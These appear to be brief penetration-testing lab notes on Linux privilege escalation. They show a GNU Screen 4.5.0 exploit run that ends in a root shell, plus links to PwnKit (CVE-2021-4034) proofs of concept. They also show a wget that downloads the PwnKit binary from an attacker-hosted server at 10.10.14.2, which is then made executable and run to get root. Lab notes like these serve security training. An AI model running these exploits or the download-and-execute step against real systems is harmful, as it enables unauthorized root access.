Vulnerable Services

Screen

screen -v

Screen version 4.05.00 (GNU) 10-Dec-16

GNU Screen 4.5.0 - Local Privilege EscalationExploit Database

$ ./screen_exploit.sh 

~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /run/screen/S-mrb3n.

# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),1000(mrb3n)

Pwnkit

GitHub - arthepsy/CVE-2021-4034: PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034)GitHub

Run lse.sh

GitHub - ly4k/PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege EscalationGitHub

$ wget http://10.10.14.2:8080/PwnKit
--2024-06-12 03:34:54--  http://10.10.14.2:8080/PwnKit
Connecting to 10.10.14.2:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: ‘PwnKit’

PwnKit                 100%[==========================>]  17.62K  --.-KB/s    in 0.04s   

2024-06-12 03:34:54 (476 KB/s) - ‘PwnKit’ saved [18040/18040]

$ chmod +x ./PwnKit
$ ./PwnKit
root@XXX-NIX05:#